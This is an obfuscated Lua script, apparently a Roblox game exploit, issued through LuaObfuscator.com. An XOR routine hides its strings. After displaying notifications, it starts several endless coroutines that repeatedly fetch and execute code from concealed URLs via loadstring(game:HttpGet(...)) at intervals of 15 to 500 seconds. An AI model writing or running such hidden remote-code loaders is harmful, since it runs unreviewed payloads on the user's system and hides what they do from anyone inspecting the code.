---------	---------	------
-		-	-		-	-
-		-	-		-	------
-		-	-		-	-
---------	---------	-

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v12=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v12,v12 + 1)),v1(v2(v9,1 + ((v12-1)% #v9),1 + ((v12-1)% #v9) + 1)))%256));end return v5(v10);end if (game.ReplicatedStorage.GameData.LatestRoom.Value<=(0 + 0)) then game.StarterGui:SetCore(v7("\163\7\83\253\223\84\225\133\60\75\250\230\80\231\173\10\65\250\243\82\239","\224\111\50\137\146\53\138"),{[v7("\182\184\101\79","\226\221\29\59")]=v7("\200\116\25\244\150\184\179\126\4\224\222\185\179\127\19\230\212\168\231\84\4\207\139\235\202\84\3\178\220\190\224\79\86\247\201\174\240\78\2\247\145\191\251\82\5\178\194\168\225\82\6\230\145\162\253\27\4\253\222\166\179\10\86\253\195\235\251\82\17\250\212\185\189","\147\59\118\146\177\203"),[v7("\198\170\205\254\247","\133\197\161\145")]=Color3.fromRGB(255,0 + 0,0 -0),[v7("\115\170\120\108","\53\197\22\24")]=nothingactually,[v7("\34\230\89\19\216\50\30\236","\100\137\55\103\139\91")]=Enum.FontSize.Size24});end if (game.ReplicatedStorage.GameData.LatestRoom.Value>=1) then local v11=0 + 0;while true do if (v11==(0 -0)) then local v13=0;local v14;while true do if (v13==(0 -0)) then v14=0 + 0;while true do if (v14==(0 + 0)) then game.StarterGui:SetCore(v7("\231\26\57\227\104\215\194\193\33\33\228\81\211\196\233\23\43\228\68\209\204","\164\114\88\151\37\182\169"),{[v7("\143\238\20\226","\219\139\108\150\122")]=v7("\214\53\216\228\207\56\95\12\224\10\216\241\155\34\29\41\232\90\250\237\140\46\34\127\173\41\212\240\129\59\11\101\254\15\212\225\141\56\25\48\225\22\206\162\141\51\26\38\248\14\210\230\198","\141\122\183\130\232\75\127\69"),[v7("\94\85\29\50\191","\29\58\113\93\205\201\177")]=Color3.fromRGB(0 + 0,20 + 235,0 + 0),[v7("\12\37\169\237","\74\74\199\153\53\183\186\179")]=nothingactually,[v7("\145\161\87\175\125\23\63\178","\215\206\57\219\46\126\69")]=Enum.FontSize.Size24});game.StarterGui:SetCore(v7("\158\227\12\187\88\68\182\238\62\182\102\81\184\230\32\170\102\86\188\236\8","\221\139\109\207\21\37"),{[v7("\117\124\22\144","\33\25\110\228\165")]=v7("\58\159\0\61\25\61\252\4\49\27\58\149\29\58\115\73\145\7\56\29\32\140\30\53\16\44\142\114\92\63\88\242\96\65\96","\105\220\82\116\73"),[v7("\212\58\87\13\237","\151\85\59\98\159")]=Color3.fromRGB(970 -(532 + 438),90 + 165,0 -0),[v7("\102\164\85\232","\32\203\59\156\57\134\162\33")]=nothingactually,[v7("\57\92\188\15\44\90\168\30","\127\51\210\123")]=Enum.FontSize.Size24});v14=1 + 0;end if (v14==(1560 -(329 + 1230))) then v11=1 -0;break;end end break;end end end if (v11==(1742 -(1717 + 23))) then local v15=0;while true do if (v15==0) then local v17=0;while true do if (v17==(0 + 0)) then game.StarterGui:SetCore(v7("\142\28\83\103\128\21\89\118\158\13\65\103\168\25\127\118\190\7\83\116\168","\205\116\50\19"),{[v7("\64\76\222\19","\20\41\166\103")]=v7("\29\171\58\10\153\184\110\187\49\13\138\169\42\232\41\0\138\163\60\172\33\13\142\236\58\167\104\17\134\163\35\230","\78\200\72\99\233\204"),[v7("\244\174\136\93\71","\183\193\228\50\53\44\91")]=Color3.fromRGB(255,1607 -(761 + 591),255),[v7("\47\90\70\232","\105\53\40\156")]=nothingactually,[v7("\223\211\59\109\202\213\47\124","\153\188\85\25")]=Enum.FontSize.Size24});coroutine.wrap(function()while true do local v23=0 + 0;while true do if (v23==(0 + 0)) then wait(60);loadstring(game:HttpGet(v7("\178\243\145\236\241\163\249\79\170\230\150\232\231\251\191\14\244\228\138\241\173\235\183\23\245\176\132\210\245\238\224\1\232","\218\135\229\156\130\153\214\96")))();break;end end end end)();v17=1 + 0;end if (v17==(1 -0)) then v15=1 -0;break;end end end if (v15==1) then v11=1 + 2;break;end end end if (v11==(1 + 0)) then local v16=0 + 0;while true do if (v16==(1 + 0)) then v11=2;break;end if (v16==0) then local v18=0;while true do if (v18==(1299 -(1197 + 102))) then game.StarterGui:SetCore(v7("\84\240\179\74\63\242\124\253\129\71\1\231\114\245\159\91\1\224\118\255\183","\23\152\210\62\114\147"),{[v7("\152\112\187\210","\204\21\195\166\47\52")]=v7("\127\255\201\170\59\116\229\197\165\53","\56\144\166\206\27"),[v7("\93\3\180\57\108","\30\108\216\86")]=Color3.fromRGB(117 + 138,255,2107 -(631 + 1221)),[v7("\226\207\92\50","\164\160\50\70\192")]=nothingactually,[v7("\241\163\38\17\118\222\182\45","\183\204\72\101\37")]=Enum.FontSize.Size24});game.ReplicatedStorage.GameData.LatestRoom.Changed:Wait();v18=1 + 0;end if (v18==1) then v16=1 + 0;break;end end end end end if (v11==(7 -4)) then coroutine.wrap(function()while true do wait(15);loadstring(game:HttpGet(v7("\240\62\226\228\43\215\130\183\58\247\231\44\136\207\241\36\184\247\55\128\130\234\43\225\187\45\161\224\225\39\208\231\34","\152\74\150\148\88\237\173")))();end end)();coroutine.wrap(function()while true do local v19=1494 -(471 + 1023);while true do if (v19==(1943 -(258 + 1685))) then wait(150);loadstring(game:HttpGet(v7("\188\253\192\95\167\179\155\0\179\224\192\71\161\235\154\76\187\228\155\127\149\203\249\110\140\192\247\103\149\202\155\75\187\230\198\92\249\228\219\65\167\253\209\93\167\164\199\76\166\224\196\91\167\166\198\78\163\166\217\78\189\231\155\92\185\224\216\74\166\214\134\112\167\249\213\88\186\214\196\67\161\250\235\67\189\238\220\91\167\167\216\90\181","\212\137\180\47")))();break;end end end end)();v11=10 -6;end if ((8 -4)==v11) then coroutine.wrap(function()while true do local v20=955 -(219 + 736);local v21;while true do if (v20==(228 -(88 + 140))) then v21=0;while true do if (v21==(0 -0)) then wait(141 + 69);loadstring(game:HttpGet(v7("\140\226\248\156\151\172\163\195\148\247\255\152\129\244\229\130\202\245\227\129\203\228\237\155\203\164\187\137\147\227\255\171\178","\228\150\140\236")))();break;end end break;end end end end)();coroutine.wrap(function()while true do local v22=0 + 0;while true do if (v22==(1444 -(751 + 693))) then wait(500);loadstring(game:HttpGet(v7("\127\153\196\194\100\215\159\157\103\140\195\198\114\143\217\220\57\142\223\223\56\159\209\197\56\142\241\220\118\170\216\232\114","\23\237\176\178")))();break;end end end end)();break;end end end
